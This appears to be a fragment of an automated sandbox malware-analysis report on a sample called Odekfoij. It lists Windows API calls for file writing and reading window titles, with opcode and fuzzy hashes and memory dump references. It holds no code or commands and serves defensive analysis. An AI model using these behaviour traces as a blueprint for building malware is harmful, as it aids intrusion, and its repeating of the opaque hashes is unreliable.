                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59